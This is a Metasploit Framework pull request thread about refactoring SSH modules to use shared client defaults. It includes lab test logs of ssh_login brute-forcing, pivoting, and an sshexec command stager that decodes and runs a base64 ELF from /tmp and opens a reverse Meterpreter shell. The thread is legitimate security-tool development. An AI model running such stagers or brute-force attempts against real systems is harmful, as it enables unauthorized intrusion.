Making SSH defaults widely used #16379

heyder · 2022-03-24T23:00:16Z

This PR fix #16328 and depends on #16318 to add append_all_supported_algorithms to true the lib/msf/core/exploit/remote/ssh.rb be landed.

Enviorement

FROM alpine:latest

RUN apk add --update
RUN apk --no-cache add openssh
RUN ssh-keygen -A
RUN echo 'root:toor' | chpasswd

RUN echo $' AuthorizedKeysFile .ssh/authorized_keys\n\
GatewayPorts no \n\
X11Forwarding no \n\
Subsystem       sftp    /usr/lib/ssh/sftp-server \n\
PasswordAuthentication yes \n\
AllowTcpForwarding yes \n\
PasswordAuthentication yes \n\
AllowTcpForwarding yes' > /etc/ssh/sshd_config

RUN echo "KexAlgorithms diffie-hellman-group1-sha1"  >> /etc/ssh/sshd_config

RUN addgroup -g 700 bob \
    && adduser -G bob -D -u 700 -S -h /home/bob -s /bin/sh bob
RUN echo -n 'bob:Password1' | chpasswd

EXPOSE 22

CMD ["/usr/sbin/sshd","-D"]

Tests

before


msf6 auxiliary(scanner/ssh/ssh_login) > set SSH_DEBUG true
SSH_DEBUG => true
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
D, [2022-03-19T15:33:25.204312 #1997] DEBUG -- net.ssh.transport.session[4114]: establishing connection to 127.0.0.1:2222
D, [2022-03-19T15:33:25.209648 #1997] DEBUG -- net.ssh.transport.session[4114]: connection established
I, [2022-03-19T15:33:25.210322 #1997]  INFO -- net.ssh.transport.server_version[4128]: negotiating protocol version
D, [2022-03-19T15:33:25.210545 #1997] DEBUG -- net.ssh.transport.server_version[4128]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-03-19T15:33:25.219134 #1997] DEBUG -- net.ssh.transport.server_version[4128]: remote is `SSH-2.0-OpenSSH_8.8'
I, [2022-03-19T15:33:25.222597 #1997]  INFO -- net.ssh.transport.algorithms[413c]: sending KEXINIT
D, [2022-03-19T15:33:25.224080 #1997] DEBUG -- socket[4150]: queueing packet nr 0 type 20 len 796
D, [2022-03-19T15:33:25.224770 #1997] DEBUG -- socket[4150]: sent 800 bytes
D, [2022-03-19T15:33:25.225522 #1997] DEBUG -- socket[4150]: read 840 bytes
D, [2022-03-19T15:33:25.225826 #1997] DEBUG -- socket[4150]: received packet nr 0 type 20 len 836
I, [2022-03-19T15:33:25.226130 #1997]  INFO -- net.ssh.transport.algorithms[413c]: got KEXINIT from server
I, [2022-03-19T15:33:25.226356 #1997]  INFO -- net.ssh.transport.algorithms[413c]: negotiating algorithms
[-] 127.0.0.1:2222 - Failed: 'bob:Password1'
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

after proper exception handling

The previous implementation was misleading the user saying the authentication failed when it indeed didn't manage to settle the key exchange algorithm.


msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
D, [2022-03-19T16:08:57.756054 #4749] DEBUG -- net.ssh.transport.session[3d68]: establishing connection to 127.0.0.1:2222 through proxy
D, [2022-03-19T16:08:57.758002 #4749] DEBUG -- net.ssh.transport.session[3d68]: connection established
I, [2022-03-19T16:08:57.758427 #4749]  INFO -- net.ssh.transport.server_version[3d7c]: negotiating protocol version
D, [2022-03-19T16:08:57.758713 #4749] DEBUG -- net.ssh.transport.server_version[3d7c]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-03-19T16:08:57.788388 #4749] DEBUG -- net.ssh.transport.server_version[3d7c]: remote is `SSH-2.0-OpenSSH_8.8'
I, [2022-03-19T16:08:57.792768 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: sending KEXINIT
D, [2022-03-19T16:08:57.793691 #4749] DEBUG -- socket[3da4]: queueing packet nr 0 type 20 len 796
D, [2022-03-19T16:08:57.794045 #4749] DEBUG -- socket[3da4]: sent 800 bytes
D, [2022-03-19T16:08:57.794369 #4749] DEBUG -- socket[3da4]: read 840 bytes
D, [2022-03-19T16:08:57.794814 #4749] DEBUG -- socket[3da4]: received packet nr 0 type 20 len 836
I, [2022-03-19T16:08:57.795104 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: got KEXINIT from server
I, [2022-03-19T16:08:57.795577 #4749]  INFO -- net.ssh.transport.algorithms[3d90]: negotiating algorithms
[-] 127.0.0.1:2222 - Could not connect: could not settle on kex algorithm
Server kex preferences: diffie-hellman-group1-sha1
Client kex preferences: ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

❗ All tests from here were performed using the same changes done by #16318 (defining the append_all_supported_algorithms to true)

I didn't commit it again here to avoid conflicts during the merge.

after ssh defaults merge


msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux 7ccf5b4903f9 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 Linux '
[!] No active DB -- Credential data will not be saved!
[*] SSH session 2 opened (127.0.0.1:53511 -> 127.0.0.1:2222 ) at 2022-03-19 20:38:29 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) >

test pivot


msf6 auxiliary(scanner/http/http_version) > route add 10.0.5.3 2
[*] Route added
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 10.0.5.3
RHOSTS => 10.0.5.3
msf6 auxiliary(scanner/http/http_version) > run
D, [2022-03-20T19:35:30.594267 #7475] DEBUG -- socket[3da4]: using encrypt-then-mac
D, [2022-03-20T19:35:30.595014 #7475] DEBUG -- socket[3da4]: queueing packet nr 25 type 90 len 80
D, [2022-03-20T19:35:31.093781 #7475] DEBUG -- socket[3da4]: sent 148 bytes
D, [2022-03-20T19:35:31.099156 #7475] DEBUG -- socket[3da4]: read 100 bytes
D, [2022-03-20T19:35:31.099588 #7475] DEBUG -- socket[3da4]: received packet nr 57 type 91 len 32
I, [2022-03-20T19:35:31.099940 #7475]  INFO -- net.ssh.connection.session[3de0]: channel_open_confirmation: 7 1 2097152 32768
D, [2022-03-20T19:35:31.602128 #7475] DEBUG -- socket[3da4]: using encrypt-then-mac
D, [2022-03-20T19:35:31.604293 #7475] DEBUG -- socket[3da4]: queueing packet nr 26 type 94 len 144
D, [2022-03-20T19:35:31.605715 #7475] DEBUG -- socket[3da4]: sent 212 bytes
D, [2022-03-20T19:35:31.614001 #7475] DEBUG -- socket[3da4]: read 324 bytes
D, [2022-03-20T19:35:31.615644 #7475] DEBUG -- socket[3da4]: received packet nr 58 type 94 len 256
I, [2022-03-20T19:35:31.618024 #7475]  INFO -- net.ssh.connection.session[3de0]: channel_data: 7 237b

[+] 10.0.5.3:80 lighttpd/1.4.64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

both modules after all changes


msf6 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 192.168.137.1:4444
[*] 127.0.0.1:2222 - Sending stager...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoiQFoAgARXInhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/EcmDF.b64'", "((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/WfpUJ' < '/tmp/EcmDF.b64' ; chmod +x '/tmp/WfpUJ' ; '/tmp/WfpUJ' ; rm -f '/tmp/WfpUJ' ; rm -f '/tmp/EcmDF.b64'"]
[*] Executing echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoiQFoAgARXInhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/EcmDF.b64'
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Executing ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/WfpUJ' < '/tmp/EcmDF.b64' ; chmod +x '/tmp/WfpUJ' ; '/tmp/WfpUJ' ; rm -f '/tmp/WfpUJ' ; rm -f '/tmp/EcmDF.b64'
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.137.1
[*] Meterpreter session 1 opened (192.168.137.1:4444 -> 192.168.137.1:51037 ) at 2022-03-24 22:48:48 +0100
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/ssh/sshexec) > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set SSH_DEBUG false
SSH_DEBUG => false
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux e6dc4f387859 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 Linux '
[!] No active DB -- Credential data will not be saved!
[*] SSH session 2 opened (?? -> ?? ) at 2022-03-24 22:49:17 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Factory is provided by mixin; Removed the options that were the same as the defaults; Adjusted the exception to proper feedback the user. There was a return as incorrect when it was indeed unable to negotiate the key exchange.

- Merge ssh defaults - Remove options equals to default

Auxiliary failed: NameError undefined local variable or method `datastore' for #<Metasploit::Framework::LoginScanner::SSH

heyder · 2022-03-25T15:48:51Z

Rspec output

$ rspec ./spec/lib/metasploit/framework/login_scanner/ssh_spec.rb

Run options: include {:focus=>true}

All examples were filtered out; ignoring {:focus=>true}

Randomized with seed 51378
...........................................................

Top 10 slowest examples (0.13319 seconds, 41.4% of total time):
  Metasploit::Framework::LoginScanner::SSH#attempt_login with a key calls Net::SSH with the correct arguments
    0.05133 seconds ./spec/lib/metasploit/framework/login_scanner/ssh_spec.rb:162
  Metasploit::Framework::LoginScanner::SSH is expected to respond to #verbosity
    0.03216 seconds ./spec/lib/metasploit/framework/login_scanner/ssh_spec.rb:61
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations cred_details is not valid for a non-array input
    0.00786 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:192
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations #valid! raises a Metasploit::Framework::LoginScanner::Invalid when validations fail
    0.00757 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:274
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations port is not valid for a non-number
    0.00671 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:85
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations host is not valid for not set
    0.00605 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:129
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base #each_credential when login_scanner has no REALM_KEY when the credential does not have a realm simply yields the original credential
    0.00583 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:401
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations stop_on_success is not valid for not set
    0.0055 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:245
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations connection_timeout is not valid for a floating point
    0.00538 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:219
  Metasploit::Framework::LoginScanner::SSH behaves like Metasploit::Framework::LoginScanner::Base validations stop_on_success is not valid for the string true
    0.00482 seconds ./spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb:250

Finished in 0.32202 seconds (files took 5.54 seconds to load)
59 examples, 0 failures

Randomized with seed 51378

heyder · 2022-03-25T16:19:36Z

After land #16318, it'll be necessary to change the tests for the ssh login scanner, specifically adding append_all_supported_algorithms => true to

metasploit-framework/spec/lib/metasploit/framework/login_scanner/ssh_spec.rb

Lines 140 to 150 in 60a9c8d

    
           opt_hash = { 
        
               :port            => ssh_scanner.port, 
        
               :use_agent       => false, 
        
               :config          => false, 
        
               :verbose         => ssh_scanner.verbosity, 
        
               :proxy           => factory, 
        
               :auth_methods    => ['password','keyboard-interactive'], 
        
               :password        => private, 
        
               :non_interactive => true, 
        
               :verify_host_key => :never 
        
           }

It should be something like that:

 opt_hash = {
            :port            => ssh_scanner.port,
            :use_agent       => false,
            :config          => false,
            :verbose         => ssh_scanner.verbosity,
            :proxy           => factory,
            :append_all_supported_algorithms => true,
            :auth_methods    => ['password','keyboard-interactive'],
            :password        => private,
            :non_interactive => true,
            :verify_host_key => :never
        }

sempervictus · 2022-03-29T11:47:20Z

Neat, thank you

bwatters-r7 · 2022-03-31T13:57:01Z

This is a really solid start; we should move on with these changes, but we also need to start looking at other modules that might need this kind of change and list them out.

heyder · 2022-04-06T23:18:57Z

This seems a good list to look at:

$ git grep   Net::SSH.start
lib/metasploit/framework/login_scanner/ssh.rb:              self.ssh_socket = Net::SSH.start(
modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb:        Net::SSH.start(ip, user, opts)
modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb:        Net::SSH.start(ip, 'admin', ssh_opts)
modules/auxiliary/scanner/ssh/fortinet_backdoor.rb:        Net::SSH.start(ip, 'Fortimanager_Access', ssh_opts)
modules/auxiliary/scanner/ssh/juniper_backdoor.rb:        Net::SSH.start(
modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb:        Net::SSH.start(ip, username, ssh_opts)
modules/auxiliary/scanner/ssh/ssh_enumusers.rb:        Net::SSH.start(ip, user, opts)
modules/exploits/apple_ios/ssh/cydia_default_ssh.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/http/alienvault_exec.rb:      Net::SSH.start(rhost, "root", opts)
modules/exploits/linux/http/cisco_firepower_useradd.rb:          Net::SSH.start(rhost, 'admin',
modules/exploits/linux/http/cisco_firepower_useradd.rb:        @ssh_socket = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/http/ubiquiti_airos_file_upload.rb:        Net::SSH.start(rhost, username, ssh_opts)
modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/cisco_ucs_scpuser.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/exagrid_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, 'root', ssh_options)
modules/exploits/linux/ssh/f5_bigip_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/ibm_drm_a3user.rb:          Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/mercurial_ssh_exec.rb:        ssh = Net::SSH.start(rhost, username, ssh_options)
modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/solarwinds_lem_exec.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/linux/ssh/symantec_smg_ssh.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb:        ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)
modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/multi/ssh/sshexec.rb:      self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
modules/exploits/solaris/ssh/pam_username_bof.rb:    Net::SSH.start(rhost, '', ssh_client_opts)
modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb:        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
modules/exploits/unix/ssh/arista_tacplus_shell.rb:        Net::SSH.start(rhost, username, opts)
modules/exploits/unix/ssh/arista_tacplus_shell.rb:        ssh = Net::SSH.start(rhost, username, opts)
modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb:        ssh = Net::SSH.start(rhost, user, opts)
modules/exploits/windows/ssh/sysax_ssh_username.rb:      ssh = Net::SSH.start(

heyder · 2022-04-13T17:04:30Z

Extra changes performed

apache_karaf_command_execution

There was a shell:exec string passed as an extra input for the exec! method from Net::SSH

before removed

msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > run

[*] 127.0.0.1:2222 - Attempt to login...
[+] 127.0.0.1:2222 - Login Successful ('bob:Password1)'
[+] 127.0.0.1:2222 - Command successfully executed.  Output: sh: shell:exec: not found

after removed

msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > set CMD whoami
CMD => whoami
msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > exploit 

[*] 127.0.0.1:2222 - Attempt to login...
[+] 127.0.0.1:2222 - Login Successful ('bob:Password1)'
[+] 127.0.0.1:2222 - Command successfully executed.  Output: bob

[*] 127.0.0.1:2222 - Loot stored at: apache.karaf.command
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) >

jheysel-r7 · 2022-04-14T19:03:32Z

#16379 (comment)

@heyder Great work so far. Let me know if you'd like me help out making some of the changes in the above list. Would love to help, I just wouldn't want to duplicate effort. Cheers.

heyder · 2022-04-15T12:26:40Z

#16379 (comment)

@heyder Great work so far. Let me know if you'd like me help out making some of the changes in the above list. Would love to help, I just wouldn't want to duplicate effort. Cheers.

Sure. Let's split what is missing by two. You can get from modules/exploits/linux/ssh/solarwinds_lem_exec.rb until the end of the list.

…-framework into fix/ssh_defaults_usage

jheysel-r7 · 2022-04-20T05:43:51Z

Testing after changes looking good:

msf6 exploit(multi/ssh/sshexec) > run

[*] Started reverse TCP handler on 192.168.123.1:4442
[*] 127.0.0.1:2222 - Sending stager...
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoewFoAgARWonhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/ZzavV.b64'", "((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/fKhOr' < '/tmp/ZzavV.b64' ; chmod +x '/tmp/fKhOr' ; '/tmp/fKhOr' ; rm -f '/tmp/fKhOr' ; rm -f '/tmp/ZzavV.b64'"]
[*] Executing echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjrAAAAggEAAAcAAAAAEAAAagJYzYCFwHQGMcCwAc2AsELNgGoCWM2AhcB17WoKXjHb9+NTQ1NqArBmieHNgJdbaMCoewFoAgARWonhamZYUFFXieFDzYCFwHkZTnQ9aKIAAABYagBqBYnjMcnNgIXAeb3rJ7IHuQAQAACJ48HrDMHjDLB9zYCFwHgQW4nhmbJqsAPNgIXAeAL/4bgBAAAAuwEAAADNgA==>>'/tmp/ZzavV.b64'
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Executing ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/fKhOr' < '/tmp/ZzavV.b64' ; chmod +x '/tmp/fKhOr' ; '/tmp/fKhOr' ; rm -f '/tmp/fKhOr' ; rm -f '/tmp/ZzavV.b64'
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.123.1
[*] Meterpreter session 4 opened (192.168.123.1:4442 -> 192.168.123.1:50741 ) at 2022-04-19 21:48:20 -0700
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > exit
[*] Shutting down Meterpreter...

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux b745012011d2 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021 x86_64 Linux '
[*] SSH session 3 opened (127.0.0.1:50631 -> 127.0.0.1:2222 ) at 2022-04-19 21:39:18 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > set cmd whoami
cmd => whoami
msf6 auxiliary(scanner/ssh/apache_karaf_command_execution) > run

[*] 127.0.0.1:2222 - Attempt to login...
[+] 127.0.0.1:2222 - Login Successful ('bob:Password1)'
[+] 127.0.0.1:2222 - Command successfully executed.  Output: bob

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

dwelch-r7 · 2022-04-22T11:44:23Z

Release Notes

Refactored a number of modules to use ssh_client_defaults

heyder added 4 commits March 21, 2022 18:06

Make module to ssh_defaults

25c4869

Factory is provided by mixin; Removed the options that were the same as the defaults; Adjusted the exception to proper feedback the user. There was a return as incorrect when it was indeed unable to negotiate the key exchange.

Use SSH defaults

6bc0032

- Merge ssh defaults - Remove options equals to default

Handling undefined local variable

ee8618e

Auxiliary failed: NameError undefined local variable or method `datastore' for #<Metasploit::Framework::LoginScanner::SSH

Checking if datastore is defined

79783bb

cdelafuente-r7 added the bug label Apr 1, 2022

heyder mentioned this pull request Apr 6, 2022

Added support to old key exchange algorithms #16318

Merged

smcintyre-r7 added the easy label Apr 11, 2022

heyder added 4 commits April 13, 2022 18:51

Module should use ssh_defaults

1305baf

Added support to depecreted key exchange algorithms

0eb9d68

Added support to depecreted key exchange algorithms

29aae09

Removed string from the command input

d3c8119

heyder marked this pull request as draft April 13, 2022 17:04

heyder added 3 commits April 14, 2022 14:48

Rollback changes used for test

64eccf5

Rubocop

c4700c9

Making SSH defaults widely used

bf849eb

jheysel-r7 self-assigned this Apr 14, 2022

heyder and others added 6 commits April 18, 2022 17:38

Making SSH defaults widely used

c7ce4d2

Rubocop

be6a56f

Making SSH defaults widely used

44b34b7

Rubocop

d2e122c

Making SSH defaults widely used

7431f76

Refactored aassigned list of modules

9e283ae

jheysel-r7 and others added 17 commits April 18, 2022 09:36

Rubocop

37e334f

Rubocop

c4d8ff8

Making SSH defaults widely used

e1d12e4

Rubocop

2f3710f

Making SSH defaults widely used

e34bff1

Rubocop

6f1a6ce

Making SSH defaults widely used

5388ac5

Rubocop

0058a3a

Making SSH defaults widely used

fcef6dd

Rubocop

42d7e4f

Making SSH defaults widely used

244d04f

Rubocop

91c08b3

Making SSH defaults widely used

83793b6

Rubocop

bdc69d8

Making SSH defaults widely used

9e54830

Rubocop

4252fe0

Merge branch 'fix/ssh_defaults_usage' of github.com:heyder/metasploit…

b363a7e

…-framework into fix/ssh_defaults_usage

heyder marked this pull request as ready for review April 18, 2022 18:21

Lint msftidy

fd6c8aa

jheysel-r7 approved these changes Apr 20, 2022

View reviewed changes

jheysel-r7 merged commit 4417a33 into rapid7:master Apr 20, 2022

heyder deleted the fix/ssh_defaults_usage branch April 20, 2022 07:01

dwelch-r7 added the rn-fix release notes fix label Apr 22, 2022

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Making SSH defaults widely used #16379

Making SSH defaults widely used #16379

heyder commented Mar 24, 2022

heyder commented Mar 25, 2022

heyder commented Mar 25, 2022 •

edited

sempervictus commented Mar 29, 2022

bwatters-r7 commented Mar 31, 2022

heyder commented Apr 6, 2022

heyder commented Apr 13, 2022 •

edited

jheysel-r7 commented Apr 14, 2022

heyder commented Apr 15, 2022

jheysel-r7 commented Apr 20, 2022

dwelch-r7 commented Apr 22, 2022

Making SSH defaults widely used #16379

Making SSH defaults widely used #16379

Conversation

heyder commented Mar 24, 2022

Enviorement

Tests

heyder commented Mar 25, 2022

heyder commented Mar 25, 2022 • edited

sempervictus commented Mar 29, 2022

bwatters-r7 commented Mar 31, 2022

heyder commented Apr 6, 2022

heyder commented Apr 13, 2022 • edited

Extra changes performed

apache_karaf_command_execution

jheysel-r7 commented Apr 14, 2022

heyder commented Apr 15, 2022

jheysel-r7 commented Apr 20, 2022

dwelch-r7 commented Apr 22, 2022

Release Notes

heyder commented Mar 25, 2022 •

edited

heyder commented Apr 13, 2022 •

edited